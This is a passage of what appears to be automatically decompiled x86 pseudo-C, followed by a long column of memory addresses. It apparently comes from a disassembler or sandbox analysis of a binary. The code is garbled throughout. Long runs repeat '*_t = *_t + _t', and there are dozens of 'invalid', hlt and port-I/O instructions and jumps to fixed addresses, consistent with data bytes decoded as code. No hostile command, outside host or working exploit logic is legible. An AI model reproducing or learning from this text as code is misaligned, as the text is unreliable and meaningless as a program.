                          							 *[fs:0x451017f] =  *[fs:0x451017f] + _t280;
                          							es = _t387;
                          							asm("hlt");
                          							_push(es);
                          							asm("adc bl, [edx]");
                          							_t358 = _t358 + _t358;
                          							_t394 = _t394 +  *_t373;
                          							 *_t280 =  *_t280 + _t280;
                          							 *((intOrPtr*)(_t358 + _t373)) =  *((intOrPtr*)(_t358 + _t373)) + _t358;
                          							_t123 = _t358 + 0x6c;
                          							 *_t123 =  *((intOrPtr*)(_t358 + 0x6c)) + _t373;
                          							_t490 =  *_t123;
                          							asm("popad");
                          							if(_t490 < 0) {
                          								L103:
                          								asm("insd");
                          								_pop(_t409);
                          								_t394 = _t394 +  *((intOrPtr*)(_t358 + 4));
                          								_t329 =  *(_t380 + _t380) * 0x1d;
                          								 *_t329 =  *_t329 + _t329;
                          								_pop(ds);
                          								_push(es);
                          								 *((intOrPtr*)(_t394 + 0x72)) =  *((intOrPtr*)(_t394 + 0x72)) + _t329;
                          								asm("popad");
                          								asm("insd");
                          								 *[gs:eax] =  *[gs:eax] ^ _t329;
                          								_t331 = _t329 +  *_t373;
                          								_t373 = _t373 + 1;
                          								_t423 = _t423 +  *((intOrPtr*)(_t329 + _t329)) - 1;
                          								_t367 = _t358 + _t358 - 1;
                          								 *0x3080325 =  *0x3080325 + _t331;
                          								asm("outsd");
                          								 *(_t387 + 0xa) =  *(_t387 + 0xa) | _t367;
                          								asm("adc bl, [esi]");
                          								_t358 = _t367 + _t367;
                          								_t280 = _t331 +  *((intOrPtr*)(_t331 + _t331));
                          								 *_t394 =  *_t394 + _t280;
                          								 *_t280 =  *_t280 + _t280;
                          								 *0x10040 =  *0x10040 + _t380;
                          								es = _t387;
                          								 *((intOrPtr*)(_t394 + _t358 + 0x40)) =  *((intOrPtr*)(_t394 + _t358 + 0x40)) + _t373;
                          								 *_t280 =  *_t280 + _t280;
                          								asm("invalid");
                          								asm("invalid");
                          								asm("invalid");
                          								asm("invalid");
                          								 *_t280 =  *_t280 + _t280;
                          								 *_t280 =  *_t280 + _t280;
                          								 *_t280 =  *_t280 ^ _t280;
                          							} else {
                          								asm("outsb");
                          								if(_t490 <= 0) {
                          									L102:
                          									 *0x6f6c6200 =  *0x6f6c6200 + _t280;
                          									goto L103;
                          								} else {
                          									asm("outsb");
                          									_t409 =  *_t394 * 0xc0106;
                          									_push(_t358);
                          									_push(_t423);
                          									_t380 = _t380 + 1;
                          									_t423 = _t423 - 1;
                          									_push(_t358);
                          									_push(_t423);
                          									_push(_t380);
                          									 *0x7ca0190 =  *0x7ca0190 + _t280;
                          									_t358 = 0x12026a04;
                          									asm("sbb eax, [eax]");
                          									 *0x12026a04 =  *0x12026a04 + 1;
                          									_t280 = _t280 ^ 0x00000000;
                          									 *_t280 =  *_t280 + _t280;
                          									asm("sbb eax, 0x5845000e");
                          									_t373 = _t373 + 1 + 2;
                          									_push(_t409);
                          									_t387 = _t387 - 1 + 1;
                          									_push(_t409);
                          									goto L98;
                          								}
                          							}
                          						}
                          					}
                          				}
                          				_t283 = _t280 + 1;
                          				 *((intOrPtr*)(_t283 + 0x40d0)) =  *((intOrPtr*)(_t283 + 0x40d0)) + _t283;
                          				 *_t283 =  *_t283 + _t283;
                          				_t284 = _t283 + _t380;
                          				asm("sbb esi, [esi]");
                          				 *_t284 =  *_t284 + _t284;
                          				 *_t284 =  *_t284 + _t284;
                          				 *_t284 =  *_t284 + _t284;
                          				 *_t284 =  *_t284 + _t284;
                          				 *_t284 =  *_t284 + _t284;
                          				 *_t284 =  *_t284 + _t284;
                          				asm("les ebx, [eax]");
                          				_t285 = _t284 + 1;
                          				 *_t373 =  *_t373 + _t285;
                          				 *_t380 =  *_t380 + _t285;
                          				 *((intOrPtr*)(_t394 + _t358 + 0x40)) =  *((intOrPtr*)(_t394 + _t358 + 0x40)) + _t373;
                          				 *_t285 =  *_t285 + _t285;
                          				asm("invalid");
                          				asm("invalid");
                          				asm("invalid");
                          				asm("invalid");
                          				 *_t285 =  *_t285 + _t285;
                          				 *_t285 =  *_t285 + _t285;
                          				_pop(ds);
                          				_t287 = _t285 + 2;
                          				 *_t287 =  *_t287 + _t380;
                          				asm("rol byte [eax], 1");
                          				 *_t287 =  *_t287 + _t287;
                          				 *_t287 =  *_t287 + _t287;
                          				asm("pushad");
                          				asm("sbb eax, 0x76");
                          				 *_t287 =  *_t287 + _t287;
                          				 *_t287 =  *_t287 + _t287;
                          				 *_t287 =  *_t287 + _t287;
                          				 *_t287 =  *_t287 + _t287;
                          				 *_t287 =  *_t287 + _t287;
                          				asm("cld");
                          				asm("sbb [eax], al");
                          				 *_t287 =  *_t287 + _t287;
                          				 *_t394 = ds;
                          				_t289 = _t287 +  *_t287 + 1;
                          				 *_t289 =  *_t289 + _t289;
                          				 *_t289 =  *_t289 + _t289;
                          				_t359 = _t358 + _t358;
                          				asm("invalid");
                          				asm("invalid");
                          				asm("invalid");
                          				 *_t289 =  *_t289 + 1;
                          				 *_t289 =  *_t289 + _t289;
                          				 *((intOrPtr*)(_t289 + 0x1f)) =  *((intOrPtr*)(_t289 + 0x1f)) + _t380;
                          				_t290 = _t289 + 1;
                          				 *((intOrPtr*)(_t290 - 0x30)) =  *((intOrPtr*)(_t290 - 0x30)) + _t290;
                          				_t291 = _t290 + 1;
                          				 *_t291 =  *_t291 + _t291;
                          				 *_t291 =  *_t291 + _t291;
                          				 *((intOrPtr*)(_t291 + 0x761c)) =  *((intOrPtr*)(_t291 + 0x761c)) + _t291;
                          				 *_t291 =  *_t291 + _t291;
                          				 *_t291 =  *_t291 + _t291;
                          				 *_t291 =  *_t291 + _t291;
                          				 *_t291 =  *_t291 + _t291;
                          				 *_t291 =  *_t291 + _t291;
                          				 *((intOrPtr*)(_t373 + _t359)) =  *((intOrPtr*)(_t373 + _t359)) + _t380;
                          				_t292 = _t291 + 1;
                          				 *_t373 =  *_t373 + _t292;
                          				 *((intOrPtr*)(_t292 + _t292)) =  *((intOrPtr*)(_t292 + _t292)) + _t292;
                          				 *_t394 = ds;
                          				_t293 = _t292 + 1;
                          				 *_t293 =  *_t293 + _t293;
                          				 *_t293 =  *_t293 + _t293;
                          				_t360 = _t359 + _t359;
                          				asm("invalid");
                          				asm("invalid");
                          				asm("invalid");
                          				 *_t293 =  *_t293 + 1;
                          				 *_t293 =  *_t293 + _t293;
                          				 *((intOrPtr*)(_t293 + 0x5000401f)) =  *((intOrPtr*)(_t293 + 0x5000401f)) + _t293;
                          				asm("rol byte [eax], 1");
                          				 *_t293 =  *_t293 + _t293;
                          				 *_t293 =  *_t293 + _t293;
                          				asm("sbb byte [0x76], 0x0");
                          				 *_t293 =  *_t293 + _t293;
                          				 *_t293 =  *_t293 + _t293;
                          				 *_t293 =  *_t293 + _t293;
                          				 *_t293 =  *_t293 + _t293;
                          				 *((intOrPtr*)(_t373 + _t360 + 0x40)) =  *((intOrPtr*)(_t373 + _t360 + 0x40)) + _t373;
                          				 *_t373 =  *_t373 + _t293;
                          				 *0x401e8c00 =  *0x401e8c00 + _t293;
                          				 *_t293 =  *_t293 + _t293;
                          				 *_t293 =  *_t293 + _t293;
                          				_t361 = _t360 + _t360;
                          				asm("invalid");
                          				asm("invalid");
                          				asm("invalid");
                          				 *_t293 =  *_t293 + 1;
                          				 *_t293 =  *_t293 + _t293;
                          				_pop(ds);
                          				_t295 = _t293 + _t380 + 1;
                          				 *((intOrPtr*)(_t295 - 0x30)) =  *((intOrPtr*)(_t295 - 0x30)) + _t295;
                          				_t296 = _t295 + 1;
                          				 *_t296 =  *_t296 + _t296;
                          				 *_t296 =  *_t296 + _t296;
                          				 *((intOrPtr*)(_t296 + 0x761d)) =  *((intOrPtr*)(_t296 + 0x761d)) + _t296;
                          				 *_t296 =  *_t296 + _t296;
                          				 *_t296 =  *_t296 + _t296;
                          				 *_t296 =  *_t296 + _t296;
                          				 *_t296 =  *_t296 + _t296;
                          				 *_t296 =  *_t296 + _t296;
                          				 *((intOrPtr*)(_t373 + _t361 + 0x10040)) =  *((intOrPtr*)(_t373 + _t361 + 0x10040)) + _t296;
                          				_push(es);
                          				 *((intOrPtr*)(_t394 + _t361 + 0x40)) =  *((intOrPtr*)(_t394 + _t361 + 0x40)) + _t373;
                          				 *_t296 =  *_t296 + _t296;
                          				asm("invalid");
                          				asm("invalid");
                          				asm("invalid");
                          				asm("invalid");
                          				 *_t296 =  *_t296 + _t296;
                          				 *_t296 =  *_t296 + _t296;
                          				 *_t296 =  *_t296 + _t296;
                          				_t297 = _t296 + 1;
                          				 *((intOrPtr*)(_t297 - 0x30)) =  *((intOrPtr*)(_t297 - 0x30)) + _t380;
                          				_t298 = _t297 + 1;
                          				 *_t298 =  *_t298 + _t298;
                          				 *_t298 =  *_t298 + _t298;
                          				 *_t298 =  *_t298 + _t298;
                          				asm("sbb eax, 0x76");
                          				 *_t298 =  *_t298 + _t298;
                          				 *_t298 =  *_t298 + _t298;
                          				 *_t298 =  *_t298 + _t298;
                          				 *_t298 =  *_t298 + _t298;
                          				 *_t298 =  *_t298 + _t298;
                          				asm("fcomp qword [ecx]");
                          				 *((intOrPtr*)(_t394 + 0x42)) =  *((intOrPtr*)(_t394 + 0x42)) + _t380;
                          				_t300 = _t298 + 0x00000001 ^ 0x2a263621;
                          				 *_t300 =  *_t300 + _t300;
                          				 *_t300 =  *_t300 + _t300;
                          				 *_t300 =  *_t300 + _t300;
                          				 *_t300 =  *_t300 + _t300;
                          				 *_t300 =  *_t300 + _t300;
                          				 *_t300 =  *_t300 + _t300;
                          				 *_t394 =  *_t394 + _t361;
                          				 *_t300 =  *_t300 + _t300;
                          				 *_t300 =  *_t300 + _t300;
                          				 *_t300 =  *_t300 + _t300;
                          				 *_t300 =  *_t300 + _t300;
                          				 *_t300 =  *_t300 + _t300;
                          				 *_t300 =  *_t300 + _t300;
                          				_t301 = _t300 |  *_t300;
                          				 *(_t301 + _t301) =  *(_t301 + _t301) | _t301;
                          				 *_t301 =  *_t301 + _t301;
                          				 *_t301 =  *_t301 + _t301;
                          				 *_t301 =  *_t301 + _t301;
                          				 *_t301 =  *_t301 + _t301;
                          				 *((intOrPtr*)(_t301 + 0x1c)) =  *((intOrPtr*)(_t301 + 0x1c)) + _t380;
                          				_t302 = _t301 + 1;
                          				 *((intOrPtr*)(_t302 - 0x10)) =  *((intOrPtr*)(_t302 - 0x10)) + _t373;
                          				 *_t302 =  *_t302 ^ _t302;
                          				_t362 = _t361 + _t361;
                          				asm("invalid");
                          				 *_t302 =  *_t302 | _t302;
                          				 *_t302 =  *_t302 + _t302;
                          				 *_t302 =  *_t302 + _t302;
                          				 *_t302 =  *_t302 + _t302;
                          				_t303 = _t302 +  *_t302;
                          				 *_t303 =  *_t303 + _t303;
                          				goto 0x74401a29;
                          				asm("sbb al, [eax]");
                          				_t304 = _t303 + 1;
                          				 *(_t380 + _t380) =  *(_t380 + _t380) + _t304;
                          				_t305 = _t304 + 1;
                          				 *_t305 =  *_t305 + _t362;
                          				 *_t305 =  *_t305 + _t305;
                          				 *_t305 =  *_t305;
                          				 *((intOrPtr*)(_t362 - 0x74000000)) =  *((intOrPtr*)(_t362 - 0x74000000)) + _t373;
                          				 *_t305 =  *_t305 + _t305;
                          				 *_t305 =  *_t305 + _t305;
                          				 *_t305 =  *_t305 + _t305;
                          				 *_t305 =  *_t305 + _t305;
                          				 *_t305 =  *_t305 + _t305;
                          				 *_t305 =  *_t305 + _t305;
                          				 *_t305 =  *_t305 + _t305;
                          				 *_t305 =  *_t305 + _t305;
                          				 *_t305 =  *_t305 + _t305;
                          				 *((intOrPtr*)(_t409 + 0x4b + _t380 * 2)) =  *((intOrPtr*)(_t409 + 0x4b + _t380 * 2)) + _t373;
                          				_t395 = _t394 - 1;
                          				_t411 = _t409 + 2;
                          				_push(_t362);
                          				_t196 = _t373 + 0x66;
                          				 *_t196 =  *((intOrPtr*)(_t373 + 0x66)) + _t305;
                          				_t498 =  *_t196;
                          				if(_t498 == 0) {
                          					L110:
                          					_t411 = _t305;
                          					_t305 = _t387;
                          					asm("lodsb");
                          					 *_t305 =  *_t305 + _t305;
                          				} else {
                          					if(_t498 >= 0) {
                          						L109:
                          						 *(_t305 - 0x6a2845bf) =  *(_t305 - 0x6a2845bf) ^ _t373;
                          						goto L110;
                          					} else {
                          						_t423 =  *(_t411 + 0x74) * 0x73;
                          						 *_t305 =  *_t305 + _t305;
                          						asm("popad");
                          						asm("o16 jz 0x75");
                          						if( *_t305 < 0) {
                          							_t423 =  *(_t411 + 0x74) * 0x73;
                          							 *_t305 =  *_t305 + _t305;
                          							_push(_t305);
                          							 *_t305 =  *_t305 + _t305;
                          							 *((intOrPtr*)(_t411 - 0x50520f0c)) =  *((intOrPtr*)(_t411 - 0x50520f0c)) + _t362;
                          							_t325 = _t362;
                          							_t362 = _t305;
                          							 *(_t411 - 0x54) =  *(_t411 - 0x54) | 0x000000ed;
                          							_t305 = _t325 - 0xb9;
                          							 *((intOrPtr*)(_t380 + 0x12d4)) = cs;
                          							 *_t305 =  *_t305 + _t305;
                          							 *_t305 =  *_t305 + _t305;
                          							 *_t305 =  *_t305 + _t305;
                          							 *_t305 =  *_t305 + _t305;
                          							 *_t305 =  *_t305 + _t305;
                          							 *_t305 =  *_t305 + _t305;
                          							 *_t305 =  *_t305 + _t305;
                          							 *_t305 =  *_t305 + _t305;
                          							 *_t305 =  *_t305 + _t305;
                          							asm("sldt word [eax]");
                          							 *_t305 =  *_t305 + _t305;
                          							 *_t305 =  *_t305 + _t305;
                          							 *_t305 =  *_t305 + _t305;
                          							 *_t305 =  *_t305 + _t305;
                          							 *_t305 =  *_t305 + _t305;
                          							 *_t305 =  *_t305 + _t305;
                          							 *_t305 =  *_t305 + _t305;
                          							 *_t305 =  *_t305 + _t305;
                          							 *_t305 =  *_t305 + _t305;
                          							 *_t305 =  *_t305 + _t305;
                          							asm("sbb al, [esi]");
                          							 *_t305 =  *_t305 + _t305;
                          							 *_t305 =  *_t305 + _t305;
                          							 *_t305 =  *_t305 + _t305;
                          							_push(0x4c004012);
                          							 *_t305 =  *_t305 + _t305;
                          							 *_t305 =  *_t305 + _t380;
                          							 *_t305 =  *_t305 + _t305;
                          							 *(_t373 + 0x319e6237) =  *(_t373 + 0x319e6237) & _t362;
                          							goto L109;
                          						}
                          					}
                          				}
                          				 *_t305 =  *_t305 + _t305;
                          				 *_t305 =  *_t305 + _t305;
                          				 *_t305 =  *_t305 + _t305;
                          				 *_t305 =  *_t305 + _t305;
                          				 *_t305 =  *_t305 + _t305;
                          				 *_t305 =  *_t305 + _t305;
                          				 *_t305 =  *_t305 + _t305;
                          				 *_t373 =  *_t373 + _t305;
                          				 *_t305 =  *_t305 + _t305;
                          				 *_t305 =  *_t305 + _t305;
                          				 *_t305 =  *_t305 + _t305;
                          				 *_t305 =  *_t305 + _t305;
                          				 *_t305 =  *_t305 + _t305;
                          				 *_t305 =  *_t305 + _t305;
                          				 *_t305 =  *_t305 + _t305;
                          				 *_t305 =  *_t305 + _t305;
                          				 *_t305 =  *_t305 + _t305;
                          				 *_t305 =  *_t305 + _t305;
                          				 *_t305 =  *_t305 + _t305;
                          				 *_t305 =  *_t305 + _t305;
                          				 *_t305 =  *_t305 + _t305;
                          				 *((intOrPtr*)(_t362 + _t305 * 4)) =  *((intOrPtr*)(_t362 + _t305 * 4)) + _t373;
                          				 *_t305 =  *_t305 + _t305;
                          				 *_t305 =  *_t305 + _t305;
                          				 *((intOrPtr*)(_t305 + 0x38)) =  *((intOrPtr*)(_t305 + 0x38)) + _t362;
                          				_t307 = _t305 + 1;
                          				 *((intOrPtr*)(_t307 + _t307 + 0x10000)) =  *((intOrPtr*)(_t307 + _t307 + 0x10000)) + _t362;
                          				 *_t307 =  *_t307 + _t307;
                          				 *_t395 = ds;
                          				_t308 = _t307 + 1;
                          				 *_t308 =  *_t308 + _t308;
                          				 *_t308 =  *_t308 + _t308;
                          				 *((intOrPtr*)(_t308 - 0xffbf44)) =  *((intOrPtr*)(_t308 - 0xffbf44)) + _t380;
                          				asm("invalid");
                          				 *_t308 =  *_t308 + 1;
                          				 *_t308 =  *_t308 + _t308;
                          				 *_t308 =  *_t308 + _t380;
                          				_pop(ds);
                          				_t309 = _t308 + 1;
                          				 *((intOrPtr*)(_t309 + _t380 * 8)) =  *((intOrPtr*)(_t309 + _t380 * 8)) + _t362;
                          				_t310 = _t309 + 1;
                          				 *_t310 =  *_t310 + _t310;
                          				 *_t310 =  *_t310 + _t310;
                          				_t311 = _t310 + _t380;
                          				asm("sbb esi, [esi]");
                          				 *_t311 =  *_t311 + _t311;
                          				 *_t311 =  *_t311 + _t311;
                          				 *_t311 =  *_t311 + _t311;
                          				 *_t311 =  *_t311 + _t311;
                          				 *_t311 =  *_t311 + _t311;
                          				 *_t311 =  *_t311 + _t311;
                          				 *_t362 = ds;
                          				_t312 = _t311 + 1;
                          				 *_t373 =  *_t373 + _t312;
                          				 *_t312 =  *_t312 + _t312;
                          				 *((intOrPtr*)(_t411 + 0x40)) =  *((intOrPtr*)(_t411 + 0x40)) + _t380;
                          				 *_t312 =  *_t312 + _t312;
                          				 *_t362 = ds;
                          				_t313 = _t312 + 1;
                          				 *_t373 =  *_t373 + _t313;
                          				 *_t313 =  *_t313 + _t313;
                          				 *((intOrPtr*)(_t362 + _t362 + 0x40)) =  *((intOrPtr*)(_t362 + _t362 + 0x40)) + _t380;
                          				 *_t313 =  *_t313 + _t313;
                          				asm("sbb eax, [eax]");
                          				 *_t313 =  *_t313 + _t313;
                          				 *_t313 =  *_t313 + _t313;
                          				_t314 = _t423;
                          				asm("sbb eax, [eax]");
                          				 *_t314 =  *_t314 + _t314;
                          				asm("sbb eax, [eax]");
                          				asm("movsb");
                          				asm("aad 0x40");
                          				 *_t314 =  *_t314 + _t314;
                          				 *_t314 =  *_t314 + _t314;
                          				_t315 = _t314 + 1;
                          				_t396 = 0xbc006c00;
                          				if (_t315 != 0) goto L112;
                          				asm("les esp, [0x25d40040]");
                          				_t316 = _t315 + 1;
                          				 *_t316 =  *_t316 + _t316;
                          				_pop(ds);
                          				 *((intOrPtr*)(_t316 + _t316)) =  *((intOrPtr*)(_t316 + _t316)) + _t380;
                          				 *_t316 =  *_t316 + _t316;
                          				asm("adc al, 0x21");
                          				_t317 = _t316 + 1;
                          				asm("invalid");
                          				 *_t317 =  *_t317 + 1;
                          				 *_t317 =  *_t317 + _t317;
                          				 *_t317 =  *_t317 + _t317;
                          				 *_t317 =  *_t317 + _t317;
                          				 *0x64400044 =  *((intOrPtr*)(0x64400044)) + 1;
                          				if ( *((intOrPtr*)(0x64400044)) == 0) goto L113;
                          				_t319 = (_t317 & 0x00000021) + 1;
                          				asm("invalid");
                          				 *_t319 =  *_t319 + 1;
                          				 *_t319 =  *_t319 + _t319;
                          				 *0x1B140048 =  *((intOrPtr*)(0x1b140048)) + _t380;
                          				asm("adc [eax], eax");
                          				_t322 = _t319 + 0x14;
                          				 *((intOrPtr*)(_t380 + 4)) =  *((intOrPtr*)(_t380 + 4)) + _t373;
                          				asm("adc al, [eax]");
                          				 *_t322 =  *_t322 + _t322;
                          				 *_t322 =  *_t322 + _t322;
                          				 *_t322 =  *_t322 + _t322;
                          				 *_t322 =  *_t322 + _t322;
                          				 *_t322 =  *_t322 + _t322;
                          				 *_t322 =  *_t322 + _t322;
                          				 *_t322 =  *_t322 + _t322;
                          				 *_t322 =  *_t322 + _t322;
                          				 *_t322 =  *_t322 + _t322;
                          				 *_t322 =  *_t322 + _t322;
                          				 *_t322 =  *_t322 + _t322;
                          				 *_t322 =  *_t322 + _t322;
                          				 *_t322 =  *_t322 + _t322;
                          				 *_t322 =  *_t322 + _t322;
                          				 *_t322 =  *_t322 + _t322;
                          				 *_t322 =  *_t322 + _t322;
                          				 *_t322 =  *_t322 + _t322;
                          				 *_t322 =  *_t322 + _t322;
                          				 *_t322 =  *_t322 + _t322;
                          				 *_t322 =  *_t322 + _t322;
                          				 *_t322 =  *_t322 + _t322;
                          				 *_t322 =  *_t322 + _t322;
                          				 *_t322 =  *_t322 + _t322;
                          				 *_t322 =  *_t322 + _t322;
                          				 *_t322 =  *_t322 + _t322;
                          				 *_t322 =  *_t322 + _t322;
                          				 *_t322 =  *_t322 + _t322;
                          				 *_t322 =  *_t322 + _t322;
                          				 *_t322 =  *_t322 + _t322;
                          				 *_t322 =  *_t322 + _t322;
                          				 *_t322 =  *_t322 + _t322;
                          				 *_t322 =  *_t322 + _t322;
                          				 *_t322 =  *_t322 + _t322;
                          				 *_t322 =  *_t322 + _t322;
                          				 *_t322 =  *_t322 + _t322;
                          				 *_t322 =  *_t322 + _t322;
                          				 *_t322 =  *_t322 + _t322;
                          				 *_t322 =  *_t322 + _t322;
                          				 *_t322 =  *_t322 + _t322;
                          				 *_t322 =  *_t322 + _t322;
                          				 *_t322 =  *_t322 + _t322;
                          				 *_t322 =  *_t322 + _t322;
                          				 *_t322 =  *_t322 + _t322;
                          				 *_t322 =  *_t322 + _t322;
                          				 *_t322 =  *_t322 + _t322;
                          				 *_t322 =  *_t322 + _t322;
                          				 *_t322 =  *_t322 + _t322;
                          				 *_t322 =  *_t322 + _t322;
                          				 *_t322 =  *_t322 + _t322;
                          				 *_t322 =  *_t322 + _t322;
                          				 *_t322 =  *_t322 + _t322;
                          				 *_t322 =  *_t322 + _t322;
                          				 *_t322 =  *_t322 + _t322;
                          				 *_t322 =  *_t322 + _t322;
                          				 *_t322 =  *_t322 + _t322;
                          				 *_t322 =  *_t322 + _t322;
                          				 *_t322 =  *_t322 + _t322;
                          				 *_t322 =  *_t322 + _t322;
                          				 *_t322 =  *_t322 + _t322;
                          				 *_t322 =  *_t322 + _t322;
                          				 *_t322 =  *_t322 + _t322;
                          				 *_t322 =  *_t322 + _t322;
                          				asm("hlt");
                          				 *_t322 =  *_t322 + _t322;
                          				 *((intOrPtr*)(_t396 + 0x44)) =  *((intOrPtr*)(_t396 + 0x44)) + _t373;
                          				_push(ds);
                          				_t323 = _t322 + 1;
                          				 *_t323 =  *_t323 + _t323;
                          				 *_t323 =  *_t323 + _t323;
                          				 *((intOrPtr*)(_t323 - 0x43)) =  *((intOrPtr*)(_t323 - 0x43)) + _t323;
                          				_t324 = _t323 + 1;
                          				 *_t324 =  *_t324 + _t324;
                          				return _t324;
                          			}

                          0x0040166d
                          0x0040166f
                          0x00401670
                          0x00401672
                          0x00401673
                          0x00401674
                          0x00401675
                          0x00401676
                          0x00401678
                          0x0040167b
                          0x0040167c
                          0x0040167d
                          0x0040167e
                          0x004015ec
                          0x004015ec
                          0x00401652
                          0x00401652
                          0x00401653
                          0x00401653
                          0x00401654
                          0x0040165b
                          0x0040165d
                          0x00000000
                          0x004015ee
                          0x004015ee
                          0x004015f0
                          0x004015f2
                          0x004015f4
                          0x004015f7
                          0x004015fa
                          0x004015fb
                          0x004015fc
                          0x00401604
                          0x00401605
                          0x00401606
                          0x00401608
                          0x0040160a
                          0x0040160c
                          0x0040160e
                          0x00401610
                          0x00401612
                          0x00401613
                          0x00401615
                          0x00401616
                          0x00401618
                          0x0040161a
                          0x0040161a
                          0x0040161e
                          0x00401621
                          0x00401622
                          0x00401626
                          0x0040162c
                          0x00401632
                          0x00401634
                          0x00401636
                          0x00401638
                          0x0040163a
                          0x0040163b
                          0x00401640
                          0x00401641
                          0x00401641
                          0x00401642
                          0x00401643
                          0x00401645
                          0x0040164b
                          0x0040164c
                          0x0040164d
                          0x00401650
                          0x00401651
                          0x00000000
                          0x00401651
                          0x0040161e
                          0x004015ec
                          0x00401575
                          0x00401575
                          0x00401578
                          0x0040157b
                          0x00401581
                          0x00401584
                          0x00401584
                          0x00401589
                          0x0040158b
                          0x0040158e
                          0x00401593
                          0x00401594
                          0x00401594
                          0x00401596
                          0x00401598
                          0x0040159c
                          0x0040159e
                          0x004015a0
                          0x004015a1
                          0x004015a3
                          0x004015a9
                          0x004015aa
                          0x004015ab
                          0x004015b1
                          0x004015b3
                          0x004015b6
                          0x004015b7
                          0x004015b9
                          0x004015bc
                          0x004015be
                          0x004015c0
                          0x004015c0
                          0x004015c0
                          0x00401572
                          0x00401570
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040145f
                          0x0040145f
                          0x004014c6
                          0x004014c6
                          0x00401461
                          0x00401461
                          0x00401462
                          0x0040146a
                          0x0040146a
                          0x0040146a
                          0x0040146d
                          0x004014e8
                          0x004014e8
                          0x004014ed
                          0x004014ef
                          0x004014ef
                          0x004014ef
                          0x004014f2
                          0x004014f4
                          0x004014f4
                          0x0040146f
                          0x0040146f
                          0x00401470
                          0x00401473
                          0x00000000
                          0x00401473
                          0x0040146d
                          0x0040145f
                          0x0040145d
                          0x00401442
                          0x0040143d
                          0x00401411
                          0x0040140f
                          0x00401682
                          0x00401684
                          0x00401685
                          0x00401686
                          0x00401688
                          0x00401689
                          0x0040168b
                          0x0040168d
                          0x0040168f
                          0x00401691
                          0x00401697
                          0x0040169c
                          0x0040169e
                          0x0040169e
                          0x004016a1
                          0x004016a2
                          0x004016a5
                          0x00401717
                          0x00401717
                          0x00401718
                          0x0040171d
                          0x0040171f
                          0x00401721
                          0x00401724
                          0x00401726
                          0x00401728
                          0x0040172b
                          0x0040172d
                          0x00401734
                          0x00000000
                          0x004016a7
                          0x004016a7
                          0x004016a8
                          0x004016a9
                          0x004016ac
                          0x004016b4
                          0x004016b6
                          0x004016b8
                          0x004016bb
                          0x004016bd
                          0x004016bd
                          0x004016c2
                          0x004016c6
                          0x004016c7
                          0x00401739
                          0x00401739
                          0x0040173a
                          0x0040173b
                          0x00000000
                          0x004016cb
                          0x004016cb
                          0x00401735
                          0x00401735
                          0x00401738
                          0x00000000
                          0x004016cf
                          0x004016cf
                          0x004016d0
                          0x0040173d
                          0x0040173d
                          0x00401741
                          0x00000000
                          0x004016d2
                          0x004016d2
                          0x004016d4
                          0x004016d5
                          0x004016e0
                          0x004016e1
                          0x004016e6
                          0x004016e9
                          0x004016eb
                          0x004016f1
                          0x004016f3
                          0x004016f6
                          0x004016f8
                          0x004016fd
                          0x004016fe
                          0x004016ff
                          0x00401701
                          0x00401703
                          0x00401703
                          0x00401703
                          0x00401706
                          0x00401707
                          0x0040170f
                          0x00401711
                          0x00401713
                          0x00000000
                          0x00401713
                          0x00401745
                          0x00401745
                          0x0040174b
                          0x0040174c
                          0x00401750
                          0x00401752
                          0x00401759
                          0x00401760
                          0x00401761
                          0x00401762
                          0x00401763
                          0x00401764
                          0x00401765
                          0x00401766
                          0x00401767
                          0x00401768
                          0x0040176e
                          0x00401770
                          0x00401775
                          0x00401777
                          0x00401779
                          0x0040177b
                          0x0040177b
                          0x0040170f
                          0x004016d0
                          0x004016cb
                          0x004016c7
                          0x0040177c
                          0x0040177e
                          0x0040177f
                          0x00401783
                          0x00401784
                          0x00401786
                          0x0040178a
                          0x0040178b
                          0x0040178c
                          0x0040178d
                          0x00401793
                          0x00401797
                          0x00401799
                          0x0040179b
                          0x0040179d
                          0x0040179f
                          0x004017a1
                          0x004017a1
                          0x004017a3
                          0x0040180a
                          0x0040180a
                          0x0040180c
                          0x0040180d
                          0x0040180e
                          0x0040180f
                          0x00000000
                          0x004017a5
                          0x004017a5
                          0x00401810
                          0x00401810
                          0x00401811
                          0x00401812
                          0x00401814
                          0x00401817
                          0x00401818
                          0x00401819
                          0x00401820
                          0x00401821
                          0x00401824
                          0x00401829
                          0x0040182a
                          0x0040182b
                          0x0040182c
                          0x0040182d
                          0x00401830
                          0x00401832
                          0x00401834
                          0x00401836
                          0x00401837
                          0x00401837
                          0x00401839
                          0x0040183a
                          0x0040183e
                          0x00401841
                          0x00401842
                          0x00401844
                          0x00000000
                          0x00401844
                          0x004017a7
                          0x004017a7
                          0x00000000
                          0x004017a9
                          0x004017a9
                          0x004017ad
                          0x004017af
                          0x004017b1
                          0x004017b5
                          0x004017b8
                          0x004017b9
                          0x004017ba
                          0x004017bb
                          0x004017c3
                          0x004017c4
                          0x004017c5
                          0x004017c6
                          0x004017c8
                          0x004017ca
                          0x004017cc
                          0x004017ce
                          0x004017d1
                          0x004017d1
                          0x004017d1
                          0x004017d4
                          0x004017d5
                          0x00401846
                          0x0040184b
                          0x0040184f
                          0x00401850
                          0x00401855
                          0x0040185e
                          0x00401860
                          0x00401861
                          0x00401862
                          0x00401865
                          0x00401866
                          0x00401867
                          0x0040186c
                          0x0040186f
                          0x00401870
                          0x00401871
                          0x00401872
                          0x00401878
                          0x00401879
                          0x0040187c
                          0x0040187e
                          0x00401880
                          0x00401883
                          0x00401885
                          0x00401887
                          0x0040188e
                          0x0040188f
                          0x00401896
                          0x00401898
                          0x0040189a
                          0x0040189c
                          0x0040189e
                          0x004018a0
                          0x004018a2
                          0x004018a4
                          0x004017d7
                          0x004017d7
                          0x004017d8
                          0x00401845
                          0x00401845
                          0x00000000
                          0x004017da
                          0x004017da
                          0x004017db
                          0x004017e2
                          0x004017e3
                          0x004017e5
                          0x004017e7
                          0x004017e9
                          0x004017eb
                          0x004017ed
                          0x004017ee
                          0x004017f4
                          0x004017f9
                          0x004017fb
                          0x004017fd
                          0x004017ff
                          0x00401801
                          0x00401806
                          0x00401807
                          0x00401808
                          0x00401809
                          0x00000000
                          0x00401809
                          0x004017d8
                          0x004017d5
                          0x004017a7
                          0x004017a5
                          0x004018a6
                          0x004018a7
                          0x004018ad
                          0x004018af
                          0x004018b1
                          0x004018b4
                          0x004018b6
                          0x004018b8
                          0x004018ba
                          0x004018bc
                          0x004018be
                          0x004018c0
                          0x004018c2
                          0x004018c3
                          0x004018c5
                          0x004018c7
                          0x004018ce
                          0x004018d0
                          0x004018d2
                          0x004018d4
                          0x004018d6
                          0x004018d8
                          0x004018da
                          0x004018dd
                          0x004018de
